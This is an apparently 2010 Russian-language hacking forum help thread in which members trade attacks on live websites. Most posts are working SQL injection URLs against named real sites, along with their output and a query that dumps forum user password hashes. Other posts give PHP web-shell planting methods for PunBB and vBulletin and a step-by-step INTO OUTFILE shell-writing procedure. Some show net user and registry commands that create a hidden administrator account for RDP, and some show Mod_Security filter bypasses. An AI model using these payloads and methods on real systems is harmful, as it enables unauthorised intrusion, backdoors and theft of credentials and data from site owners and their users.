SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1/*
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1--
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1#


Это всё уже попробовал,не катит. Пишет

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+union+select+1/*' LIKE CONCAT('%',url,'%')' at line 1

kfor
19.09.2010, 22:50
Darth Padla said:
Это всё уже попробовал,не катит. Пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+union+select+1/*' LIKE CONCAT('%',url,'%')' at line 1


ну могу тебе сказать тока как и предыдущему человеку кидай сыль в личку... ему ответ кинул надеюсь поможет ... если смогу и тебе помогу..

SofiaLoar
20.09.2010, 01:54
А почему в личку?мне не жалко,просто из принципа раскрутить хочется.

view-source:http://znakomye.ru/news.php?дальше скуля

GroM88
20.09.2010, 08:58
Народ, такой вопрос.

Вообщем залил шел wso2 на win2k3 имею полный доступ ко всему что находится на винте.

Как через шелл создать юзера и добавить его в группу админов что бы я мог зайти на RDP ?

kfor
20.09.2010, 09:37
Darth Padla said:
А почему в личку?мне не жалко,просто из принципа раскрутить хочется.
view-source:http://znakomye.ru/news.php?
дальше скуля


Блин проковырялся , но ничё не вышло....

Strilo4ka
20.09.2010, 10:01
GroM88 said:
Народ, такой вопрос.
Вообщем залил шел wso2 на win2k3 имею полный доступ ко всему что находится на винте.
Как через шелл создать юзера и добавить его в группу админов что бы я мог зайти на RDP ?


учётка для дедика:

net user user password /add

net localgroup Administrators user /add

net localgroup "Remote Desktop Users" user /add

net accounts /maxpwage:unlimited

скрыть учетку:

Для этого заходим в реестер (Пуск > Выполнить > regedit.exe) переходим в

HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINE->SOFTWARE->Microsoft->WindowsNT->CurrentVersion->Winlogon->SpecialAccounts->UserList

и создаём там новый параметр DWORD (правой кнопкой мыши,новый параметр DWORD)

Называем этот параметр именем твоего аккаунта,и присваиваем ему численное значение 0.

ну и патч для мультиюзерности ставим.

ответ 3x'e'orcist

так это вроде как палевно,юзер может заметить как ты у него в реестре копаешся

предлагаю сразу ключик добавить с cmd:

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" \v ИМЯ УЧЁТКИ \t REG_DWORD \d "00000000" \f

GroM88
20.09.2010, 10:06
Вы походу неправельно меня поняли. Я имел ввиду не как создать учетку на дедике.

А как создать учетку через залитый шелл на дедик)

kfor
20.09.2010, 10:09
GroM88 said:
Вы походу неправельно меня поняли. Я имел ввиду не как создать учетку на дедике.
А как создать учетку через залитый шелл на дедик)


Нет тебе правильно сказали. Напиши рег файл, запихай в автозагрузку и ребуть. Ну или если сможешь выполнить его, то выполняй. Тока через реестр можно добавить.

GroM88
20.09.2010, 10:44
ммм...

я создал .bat файл с содержанием

net user логин пасс /add

net localgroup Administrators user /add

net localgroup "Remote Desktop Users" user /add

net accounts /maxpwage:unlimited

подскажите в какую папочку его запихнуть что бы после ребута он автоматом запустился?

Gorev
20.09.2010, 11:07
GroM88 said:
ммм...
я создал .bat файл с содержанием
net user логин пасс /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
подскажите в какую папочку его запихнуть что бы после ребута он автоматом запустился?


зачем тебе бат файл? зачем так извращатся? дали же тебе решение чуть выше...

547
20.09.2010, 19:18
GroM88 said:
ммм...
я создал .bat файл с содержанием
net user логин пасс /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
подскажите в какую папочку его запихнуть что бы после ребута он автоматом запустился?


запусти его сам и все можеш батник удалить,главное не забудь как Strlilo4ka->exor(ist,добавить ключик в реестр...

-PRIVAT-
20.09.2010, 20:18
Имеется инъекция с выводом в ошибке, такого типа 1062 - Duplicate entry '38411' for key 1 . Есть ли софт, который будет дампить значение в ковычках, то есть 3841, так как последний символ отбрасывается?

P.S Скуля переберается лимитом, так и софт должен делать +1 лимит. +)

daniel_1024
20.09.2010, 20:54
toolza от Pashkela - /thread148915.html

очень много режимов работы

Redwood
20.09.2010, 21:49
-PRIVAT- said:
Имеется инъекция с выводом в ошибке, такого типа 1062 - Duplicate entry '
3841
1' for key 1 . Есть ли софт, который будет дампить значение в ковычках, то есть 3841, так как последний символ отбрасывается?
P.S Скуля переберается лимитом, так и софт должен делать +1 лимит. +)




PHP:




Вот, написал скрипт, все действия прокомментировал, запрос поменяешь под себя.

547
20.09.2010, 23:57
как узнать версию mybb

SofiaLoar
21.09.2010, 06:38
Походу blind sql

http://www.mirdela.ru/news.php?nid=-351+union+select+1,2,3,4,5,6,8,9,10+--+

Выдает то же,что по запросу

http://www.mirdela.ru/news.php?nid=-351

А если что нибудь убрать,выдаст

2Can not select content

Как такую раскрутить?хотя бы версию узнать.

kfor
21.09.2010, 10:53
Darth Padla said:
Походу blind sql
http://www.mirdela.ru/news.php?nid=-351+union+select+1,2,3,4,5,6,8,9,10+--+
Выдает то же,что по запросу
http://www.mirdela.ru/news.php?nid=-351
А если что нибудь убрать,выдаст
2Can not select content
Как такую раскрутить?хотя бы версию узнать.


нет там есть вывод. Версия у тебя 4.1.25-log.

Я особо не вдавался в подробности, поэтому покажу как я на горячую нашёл.

Вот запрос - http://www.mirdela.ru/news.php?nid=351/**/union/**/select/**/version(),version(),version(),version(),version(), version(),version(),version(),version()/*

Сделай поиск по 4.1.25-log И увидишь на странице где идёт вывод.

Gorev
21.09.2010, 11:02
Darth Padla said:
Походу blind sql
http://www.mirdela.ru/news.php?nid=-351+union+select+1,2,3,4,5,6,8,9,10+--+
Выдает то же,что по запросу
http://www.mirdela.ru/news.php?nid=-351
А если что нибудь убрать,выдаст
2Can not select content
Как такую раскрутить?хотя бы версию узнать.


http://www.mirdela.ru/news.php?nid=351+UNION+SELECT+1,2,AES_DECRYPT%28AE S_ENCRYPT%28CONCAT_WS%280x3a,Version%28%29,Databas e%28%29,User%28%29%29,0x71%29,0x71%29,4,5,6,7,8,9--

Version: 4.1.25-log

Database: nsk24ru0_realty

User: nsk24ru0_realty@localhost

колонок 9 а не 10..order by юзай

Gorev
21.09.2010, 12:41
Шелл в punBB, кто знает как?

d1v
21.09.2010, 12:49
Gorev said:
Шелл в punBB, кто знает как?


а какая версия?

547
21.09.2010, 12:57
Заливка шелла в PunBB 1.2.17

admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz

шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)


================================================== =========
PunBB Automatic Image Upload 1.0 Shell Upload Vulnerability
================================================== =========
@Title: PunBB Image Upload 1.0 Shell Upload Vulnerability
@Author: The_Exploited aka l3d aka Spoof
@Mail: spoof@live.it
@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/
@PHP File Bugged: http://mysite.com/punbb/uploadimg.php
@Shellz: Upload the shell to "uploadimg.php"
@Mod Download: http://www.punres.org/download.php?id=1523
@Mod Version: 1.0
@Date: 2010-04-09

Gorev
21.09.2010, 15:32
547 said:
Заливка шелла в PunBB 1.2.17
admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz
шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)


version 1.2.14 ничего похожее на packager там нет... (

kfor
21.09.2010, 15:43
Gorev said:
version 1.2.14 ничего похожее на packager там нет... (


А ты это пробовал ?

http://seclists.org/bugtraq/2007/Apr/174

Gorev
21.09.2010, 15:56
kfor said:
А ты это пробовал ?
http://seclists.org/bugtraq/2007/Apr/174


не могу его использовать так как пасс узнал из других источников нежели из базы форума, не знаю префикс..а гадать его долго...

547
21.09.2010, 18:49
ктото с таким сталкивался?

http://www.chinashopunion.com/productinfo.php?id=109+/*!UnIoN+SeLeCt*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

[Feldmarschall]
21.09.2010, 19:17
547 said:
ктото с таким сталкивался?
http://www.chinashopunion.com/productinfo.php?id=109+/*!UnIoN+SeLeCt*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15




Code:
http://www.chinashopunion.com/productinfo.php?id=(select+1+from+(select+count(0) ,concat((select+table_name+from+information_schema .tables+limit+0,1),floor(rand(0)*2))+from+informat ion_schema.tables+group+by+2+limit+1)a)

547
21.09.2010, 19:23
"]
[Feldmarschall] said:

Code:
http://www.chinashopunion.com/productinfo.php?id=(select+1+from+(select+count(0) ,concat((select+table_name+from+information_schema .tables+limit+0,1),floor(rand(0)*2))+from+informat ion_schema.tables+group+by+2+limit+1)a)



выдает:


查询失败: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.tables group by 2 limit 1)a)' at line 1

-PRIVAT-
21.09.2010, 19:27
547 said:
выдает:


Он выдаёт при запросе http://www.chinashopunion.com/productinfo.php?id=(select+1+from+(select+count(0) ,concat((select+table_name+from+information_schema .tables+limit+0,1),floor(rand(0)*2))+from+informat ion_schema.tables+group+by+2+limit+0,1)a)

Duplicate entry 'CHARACTER_SETS1' for key 1 То есть имя первой таблицы. Лимитом вот так перебирай их, лимит в середине запроса.

[Feldmarschall]
21.09.2010, 19:28
547, ты пробелы убери >

547
21.09.2010, 19:43
да я на самом деле шарю error based но иногда теряю бдительность

спасибо за помощь,убрал пробелы и все ок

Lilo
21.09.2010, 20:09
http://arbaleta.net/detail/1283'/

wtf?

mr.celt
22.09.2010, 14:27
Lilo said:
http://arbaleta.net/detail/1283'/
wtf?


По-моему там ничего нет.

-PRIVAT-
22.09.2010, 14:51
Lilo said:
http://arbaleta.net/detail/1283'/
wtf?


Просто ошибка вроде.

ALIM
22.09.2010, 16:11
есть скуля

http://www.libyaonline.com/business/pages.php?cid=298 order by 1 --

пишу union пишет ошибку

http://www.libyaonline.com/business/pages.php?cid=298%20union%20select%201/*

пробывал ч-з blind не выходит

R1dex
22.09.2010, 16:35
http://www.libyaonline.com/business/pages.php?cid=298+and+ascii(substring((select+1+fr om+users+limit+0,1),1,1))>1--

или

http://www.libyaonline.com/business/pages.php

?cid=(1)and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from users group by x)a)--

AloneKiller
23.09.2010, 02:41
Здравствуйте, не подскажите как залить шел из админки воблы 3.8.5 ?

Gedj
23.09.2010, 06:24
AloneKiller said:
Здравствуйте, не подскажите как залить шел из админки воблы 3.8.5 ?


Через модули тем куча читай

gabarea
23.09.2010, 10:09
http://www.realitytvworld.com/index/articles/summary.php?i=133

shell_c0de:Еще раз такой пост увижу в БАН!

вам влом описать суть вопроса или тут должны догодатся и раскручивать вам ?

R1dex
23.09.2010, 10:54
http://www.realitytvworld.com/index/articles/summary.php?i=133 or(1,2)=(select*from(select name_const((select+version()),1),name_const((selec t+version()),1))a)

jecka3000
23.09.2010, 13:53
помогите найти админку. Нашел /controlpanel/ & /login.php

Залогинился в логин.пхп как админ, а вот саму админку найти не могу=(

mr.celt
23.09.2010, 14:50
jecka3000 said:
помогите найти админку. Нашел /controlpanel/ & /login.php
Залогинился в логин.пхп как админ, а вот саму админку найти не могу=(


Ссылку не выложишь? Как это: авторизацию прошел и никуда не редиректили?

kfor
23.09.2010, 15:28
jecka3000 said:
помогите найти админку. Нашел /controlpanel/ & /login.php
Залогинился в логин.пхп как админ, а вот саму админку найти не могу=(


Извини не выдержал.... У тебя перед глазами сайт и ты не нашёл где админка, а хочешь что бы мы могли угадать по двум словам? =)

Лан чтоб уж не пустозвонить ... ты из какого браузера заходишь? Иногда, бывает, что только в осле нормально работают некоторые админки. Так же может у тебя появились полномочия править статьи.. новости... походи по сайту и посмотри....

tracy
23.09.2010, 19:02
AloneKiller said:
Здравствуйте, не подскажите как залить шел из админки воблы 3.8.5 ?


В админке: Plugins & Products -> Plugin Manager -> [Add New Plugin]

вписываем eval($_REQUEST[cmd]); в любой темплейт, например в faq_complete, Plugin is Active выставляем "Yes" и сохраняем

шелл будет тут:

http://localhost/forum/faq.php?cmd=phpinfo();

Gorev
23.09.2010, 19:26
tracy said:
В админке:
Plugins & Products -> Plugin Manager -> [Add New Plugin]
вписываем
eval($_REQUEST[cmd]);
в любой темплейт, например в faq_complete, Plugin is Active выставляем "Yes" и сохраняем
шелл будет тут:
http://localhost/forum/faq.php?cmd=phpinfo();


К чему весь этот цирк? потом все новичку привыкают при первом же вопросе постить в эту ветку, которая повторяет по тысячному разу одни и те же вопросы...посылать надо в поиск ...или если и хочется поможь то непосредственно линк на ветку, сейчас начнутся вопросы что такое евал итд и тп...

z0mbyak
24.09.2010, 12:03
Доброго времени суток, уважаемые форумчане!

Вы не могли бы помочь мне восполнить пробелы в моих знаниях?-)

Дело в том, что никак не могу затить шелл через админку(сайт на джумле), так как доступ к установке чего-либо закрыт, редактирование языков и тд тоже, ну и глобальные настройки само собой... Можно только заливать картинки...

Собственно вопрос: Можно ли каким-либо образом подменить майм-тайп у отправляемого мною шелла, без замены расширения? Дело в том, что инклудов я на сайте не нашел...

Заранее благодарю за помощь...

попугай
24.09.2010, 14:36
z0mbyak said:
Доброго времени суток, уважаемые форумчане!
Вы не могли бы помочь мне восполнить пробелы в моих знаниях?-)
Дело в том, что никак не могу затить шелл через админку(сайт на джумле), так как доступ к установке чего-либо закрыт, редактирование языков и тд тоже, ну и глобальные настройки само собой... Можно только заливать картинки...
Собственно вопрос: Можно ли каким-либо образом подменить майм-тайп у отправляемого мною шелла, без замены расширения? Дело в том, что инклудов я на сайте не нашел...
Заранее благодарю за помощь...



одной подменой mime-type не отделаешься - там еще проверка расширения идет.

auth_root
24.09.2010, 15:25
Не подскажете, как обойти фильтрацию.

module.php?id=104+union+select+1,version(),3,4--+

выводит 5.0.91-community

проверяю

module.php?id=104+union+select+1,2,version(),3,4+f rom+information_schema.tables--+

выводит версию, columns так же

Когда пытаюсь вывести таблицы table_name перебрасывает на страницу


406 Not Acceptable
An appropriate representation of the requested resource /products.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


column_name так же и из information_schema.columns

Выводится только table_schema (information_schema.tables/columns), остальное видимо фильтруется.

Пробовал обойти

CoLuMn_NaMe

cOlUmN_nAme

и т.д.

c table_name так же. Перебрасывает на 406 Not Acceptable

Подскажите как обойти фильтрацию.

Заранее благодарен.

tracy
24.09.2010, 16:20
Так и должно быть и нету тут фильтрации

module.php?id=104+union+select+1,version(),3,4--+

Это правильный запрос.

попугай
24.09.2010, 16:27
tracy said:
Так и должно быть и нету тут фильтрации
module.php?id=104+union+select+1,version(),3,4--+
Это правильный запрос.



Что? У него то же самое, он хочет не только версию, но и инфу из inf. schema вытащить

auth_root
24.09.2010, 17:31
попугай прав. Зачем мне одна версия, имя бд и юзер. Мне нужна инфа о таблицах и колонках из information_schema.tables и information_schema.columns

Фильтруются при запросе column_name и table_name

table_schema нет, но этого мало. Иначе зачем мне уязвимость?

Redwood
24.09.2010, 18:56
2 auth_root

Mod_Security


Code:
module.php?id=104+union+select+1,/*!table_name*/,3,4+from+information_schema.tables



Code:
module.php?id=104+union+select+1,/*12345!table_name*/,3,4+from+information_schema.tables

Либо сразу весь запрос загони в комментарии.

brutos
25.09.2010, 00:11
Есть сайт с mysql, file_priv=Y, нет раскрытия путей... Нужно узнать путь для заливки шелла через sql inj. Система - Windows.

Есть возможность читать файлы вот так:

id=-1+union+select+1,2,load_file(0x633a5c626f6f742e696 e69),4+--+

где 0x633a5c626f6f742e696e69 - C:/boot.ini

Инклуд тоже не нашел, иначе бы в C:/ файл и залил.

Нужно перебором найти папку с сайтом, но я не знаю, где обычно в Windows-серверах располагают сайты. Наверняка это где-то уже обсуждалось, но не могу найти...

Или какой файл можно поискать, в котором может быть написано, куда установлен mysql или apache (в C:/ и C:/Program Files искал, но, видимо, их там нет)? Может, еще какие идеи?

Сталкиваюсь с таким в первый раз, потерялся))

Konqi
25.09.2010, 00:15
brutos попробуй

c:\wwwroot\имя сайта\

c:\wwwroot\имя сайта\htdocs\

c:\wwwroot\имя сайта\www\

c:\wwwroot\htdocs\

и т.д.

brutos
25.09.2010, 00:30
Konqi, спасибо. Пока глухо, буду искать дальше, но уже хоть есть от чего оттолкнуться)

auth_root
25.09.2010, 00:34
Redwood

Спасибо большое. Помогло. +

brutos

C:\WebServers\home\localhost\www

=)

brutos
25.09.2010, 01:29
auth_root said:
C:\WebServers\home\localhost\www


Ага, смотрел. Ну там явно не Denwer

Konqi
25.09.2010, 01:30
brutos попробуй те же пути на других дисках, например D:\

durito
25.09.2010, 13:35
вот из такого что-то выжать можно?

http://partnervanjedromen.nl/search_result.php?Sex=Female%27&LookingFor=female&DateOfBirth_start=19&DateOfBirth_end=44

или подскажите где почитать инфу

R1dex
25.09.2010, 14:51
http://partnervanjedromen.nl/search_result.php?Sex=Female') and 1=0 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30--+&LookingFor=female&DateOfBirth_start=19&DateOfBirth_end=44

shell_c0de
25.09.2010, 15:08
brutos said:
Есть сайт с mysql, file_priv=Y, нет раскрытия путей... Нужно узнать путь для заливки шелла через sql inj. Система - Windows.
Есть возможность читать файлы вот так:
id=-1+union+select+1,2,load_file(0x633a5c626f6f742e696 e69),4+--+
где 0x633a5c626f6f742e696e69 - C:/boot.ini
Инклуд тоже не нашел, иначе бы в C:/ файл и залил.
Нужно перебором найти папку с сайтом, но я не знаю, где обычно в Windows-серверах располагают сайты. Наверняка это где-то уже обсуждалось, но не могу найти...
Или какой файл можно поискать, в котором может быть написано, куда установлен mysql или apache (в C:/ и C:/Program Files искал, но, видимо, их там нет)? Может, еще какие идеи?
Сталкиваюсь с таким в первый раз, потерялся))


пробуй варианты

C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err

C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log

C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err

C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log

C:\Program Files\MySQL\data\hostname.err

C:\Program Files\MySQL\data\mysql.log

C:\Program Files\MySQL\data\mysql.err

C:\Program Files\MySQL\data\mysql-bin.log

C:\MySQL\data\hostname.err

C:\MySQL\data\mysql.log

C:\MySQL\data\mysql.err

C:\MySQL\data\mysql-bin.log

C:\Program Files\MySQL\MySQL Server 5.0\my.ini

C:\Program Files\MySQL\MySQL Server 5.0\my.cnf

C:\Program Files\MySQL\my.ini

C:\Program Files\MySQL\my.cnf

C:\MySQL\my.ini

C:\MySQL\my.cnf

Mirrey
25.09.2010, 15:39
Как залить шелл в InstantCMS? Нигде не могу найти.

Vlad3d
25.09.2010, 15:44
есть сайт с sql inj, через нее удалось достать логин и пароль администратора, но в админки нет ни единого намека на залифку файлов/картинок и прочего... Так вот, можно ли залить шелл через sql или еще как нибудь ?

P.S. только начал изучать sql inj нашел много статей интересных, а про шеллы почти ничего нет(только то что можно залить через админку).

emillord
25.09.2010, 15:49
Vlad3d said:
есть сайт с sql inj, через нее удалось достать логин и пароль администратора, но в админки нет ни единого намека на залифку файлов/картинок и прочего... Так вот, можно ли залить шелл через sql или еще как нибудь ?
P.S. только начал изучать sql inj нашел много статей интересных, а про шеллы почти ничего нет(только то что можно залить через админку).


/thread43966.html (https://antichat.live/threads/43966/)

Пункт 2.2

Проверить привилегии на запись можно вот так:


http://www.stylisdesigns.com/catalog.php?ID=-79+union+select+1,2,3,file_priv,5,6,7,8,9,0,1,2,3, 4,5+from+mysql.user+where+user=%27swdata%27--+


N - no = нет прав

Y - yes = есть права

ZARO
25.09.2010, 16:09
Vlad3d said:
есть сайт с sql inj, через нее удалось достать логин и пароль администратора, но в админки нет ни единого намека на заливку файлов/картинок и прочего... Так вот, можно ли залить шелл через sql или еще как нибудь ?
P.S. только начал изучать sql inj нашел много статей интересных, а про шеллы почти ничего нет(только то что можно залить через админку).


Попробуй поискать инклюды в админке. Для заливки шелла через инжект Проверь эти пункты:

1. Экранирование ковычек он же magic_quotes_qpc. Эта шняга должна быть установлена на off в php.ini. Попробуй в любое поле вписать текст 'lol' и если запрос обработается успешно и выведет "lol", то по первому пункту проходит.

2. Права доступа к счеме mysql. Попробуй вывести что угодно, даже циферки из mysql.user. Пример :UNION SELECT 1,2,3 from mysql.user. Если запрос обработается также как и при UNION SELECT 1,2,3, то по этому пункту тоже проходит.

3. file_priv. Сперва узнаем через какого юзера мы подключены к бд. Для этого отправляем запрос UNION SELECT user(),2,3. Например нам вывело root@localhost. Теперь проверяем file_priv у нашего юзера - select file_priv,2,3 from mysql.user where user='root' (если magic_quotes_qpc=on, то root заменить на хекс - 0x726F6F74. Соответственно мы тогда не проходим по 1 пункту, но зато можем читать файлы через функцию load_file). Если выдало Y - у нашего юзера есть файл привелигии и мы проходим по этому пункту else не проходим

4. Путь. Мы должны знать полный путь от корня сервера. например: /home/www/site/

5. Возможность запись в папку. Если не пишется в /home/www/site/ можно попробовать записать в /home/www/site/images/ к примеру.

Собственно как лить :

union select 'наш пхп код',2,3 from mysql.user into outfile '/home/www/site/images/lol.php' . Если по всем вышеперечисленным пунктам все ок и вы сделали все правильно, то по адресу http://site/images/lol.php будет лежать наш файлиг. Если что-то непонятно пиши в пм - всегда рад помочь

Strilo4ka
25.09.2010, 20:54
Mirrey said:
Как залить шелл в InstantCMS? Нигде не могу найти.


Поиск для чего на форуме!?

Когда то было выполнение кода в админке, ща хз.

/threadnav189469-2-10-instant%2Bcms.html

KandidaT'S
26.09.2010, 12:51
ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака

ZARO
26.09.2010, 12:56
KandidaT'S said:
ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака


http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+informati on_schema.PROFILING+--+

Табла PROFILING - системная табла и в ней ничего полезного ты не найдешь, и она находится в счема information_schema. Поэтому перед таблой нужно написать счему откуда выводим.

-PRIVAT-
26.09.2010, 13:06
KandidaT'S, давай выведем таблицы:


http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28table_name%29, 5,6,7+from+information_schema.tables--


Ну, а дальше выбирай таблицы и выводи колонки таким образом :


http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,5,6,7+from+information_schema.columns+where+table _name=0x7068706262666f72756d735f61636c5f7573657273--


table_name=TABLE_NAME в Hex виде. Hex вид можно получить тут (http://x3k.ru)

Затем, как выведешь колонки, выводи данные так:


http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,Колонка ,колонка,колонка),5,6,7+from+TABLE_N AME


Где TABLE_NAME - имя таблицы откуда выводим.

Expl0ited
26.09.2010, 13:34
KandidaT'S said:
ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака


потому что там ничего нет, а вот это тебе будет интересней


Code:
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,username,user_ password),5,6,7+from+xtremelabs_forums.phpbbforums _users+limit+1,1+--+

Strilo4ka
26.09.2010, 13:35
KandidaT'S said:
ВОобщем смотрите http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,group_concat%28column_name%29 ,group_concat%28column_name%29,6,7+from+informatio n_schema.columns+where+table_name=0x50524f46494c49 4e47%20-- Так Всё норм а делаю потом так http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,CPU_USER,5,6,7+from+PROFILING +--+ и нечего не получается =( в чём ошибака


БД


Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28SCHEMA_NAME%20 SEPARATOR%200x3a%29%20,5,6,7%20FROM%20information_ schema.SCHEMATA

information_schema:xtremelabs_forums:xtremelabs_si te:xtremelabs_tforums

Tables


Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28TABLE_NAME%20S EPARATOR%200x3a%29%20,5,6,7%20FROM%20information_s chema.TABLES%20limit%200,1



Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,database%28%29%20,5,6,7%20FRO M%20information_schema.TABLES%20limit%200,1

БД текущая -> xtremelabs_site -> 0x787472656d656c6162735f73697465


Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,GROUP_CONCAT%28TABLE_NAME%20S EPARATOR%200x3a%29%20,5,6,7%20FROM%20information_s chema.TABLES%20WHERE%20TABLE_SCHEMA=0x787472656d65 6c6162735f73697465

admins:articles:articlescategories:categories:news :newscategories

там нет таблицы PROFILING, она в другой БД.


Code:
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,TABLE_SCHEMA%20%20,5,6,7+from +information_schema.TABLES+where+table_name=0x5052 4f46494c494e47%20--

information_schema

она в схеме


Code:
http://xtremelabs.org/index.php?location=news&url=-1+union+select+1,2,3,%20count%28*%29%20,5,6,7%20FR OM%20information_schema.PROFILING



Другие новости категории
[01.01.1970]
0


она пустая, там ниче нет.

KandidaT'S
26.09.2010, 14:58
Всем Спасибо

Zilt0
27.09.2010, 00:51
Всем привет,

как можно раскрыть пути в joomla 1.5.

Strilo4ka
27.09.2010, 00:59
копипась моего поста, не помню где он.

Joomla_1.5.15-Stable-Full_Package.zip

у себя проверял


Code:
http://localhost/lastjoom/index.php?limitstart=-5



Warning: Invalid argument supplied for foreach() in Z:\home\localhost\www\lastjoom\components\com_cont ent\models\frontpage.php on line 104


может поможет.

YuNi|[c
27.09.2010, 01:36
э хз как обойти в таком раскладе, может подскажем:

http://localhost/script.php

POST

ref=BIG'

что не пробовал на все одинаков ответ ((

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3

Что за трабла тут со скобками?

Expl0ited
27.09.2010, 06:25
YuNi|[c said:
э хз как обойти в таком раскладе, может подскажем:
http://localhost/script.php
POST
ref=BIG'
что не пробовал на все одинаков ответ ((
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3
Что за трабла тут со скобками?


ref=BIG') and 1=0 по идеи должен съесть но ничего из БД не выдать.

ref=BIG') and 1=1 а так выдать

ref=BIG') order by 10000 -- по идеи тоже должно сработать выдать Unknown column '10000'

ну а дальше ты понял, и если у тебя на локалке, то привел бы код из скрипта, который обрабатывает переменную $_POST['ref'] и делает с ней запрос в БД

Welemir
27.09.2010, 18:31
Кто компилил сие чудо под gcc ? http://inj3ct0r.com/exploits/7595(паблик).Выдаёт кучу синтаксических ошибок.Разумеется,SunOs 5.10/5.11

<Cyber-punk>
27.09.2010, 19:02
Welemir said:
Кто компилил сие чудо под gcc ? http://inj3ct0r.com/exploits/7595(паблик).Выдаёт кучу синтаксических ошибок.Разумеется,SunOs 5.10/5.11


Его компилировать не надо, вроде, это sh скрипт.

Создай файл, закинь в него содержимое сплойта, и запусти ./exploit.sh

Zilt0
27.09.2010, 19:26
Strilo4ka said:
копипась моего поста, не помню где он.
Joomla_1.5.15-Stable-Full_Package.zip
у себя проверял

Code:
http://localhost/lastjoom/index.php?limitstart=-5

может поможет.


Спасибо огромное,

Но видимо не все версии подвержены, у некоторых не показывается,

YuNi|[c
28.09.2010, 06:28
Expl0ited said:
ref=BIG') and 1=0 по идеи должен съесть но ничего из БД не выдать.
ref=BIG') and 1=1 а так выдать
ref=BIG') order by 10000 -- по идеи тоже должно сработать выдать
Unknown column '10000'
ну а дальше ты понял, и если у тебя на локалке, то привел бы код из скрипта, который обрабатывает переменную $_POST['ref'] и делает с ней запрос в БД


Вообще то вот так выглядит запрос по настояшему:


Code:
script.php?Sex=female&YearFrom=18&YearTo=40'

а ответ:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3

на тот же


Code:
script.php?Sex=female&YearFrom=18&YearTo=40') order by 1000--

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') order by 1000--+1 YEAR) AND upApproved = '1' LIMIT 1' at line 3

пробовал разные варианты и floor rand не пашет ((

PS.так как линк крупный не постил тут. Прошу помочь если у кого есть идеи

Expl0ited
28.09.2010, 08:30
YuNi|[c said:
Вообще то вот так выглядит запрос по настояшему:

Code:
script.php?Sex=female&YearFrom=18&YearTo=40'

а ответ:
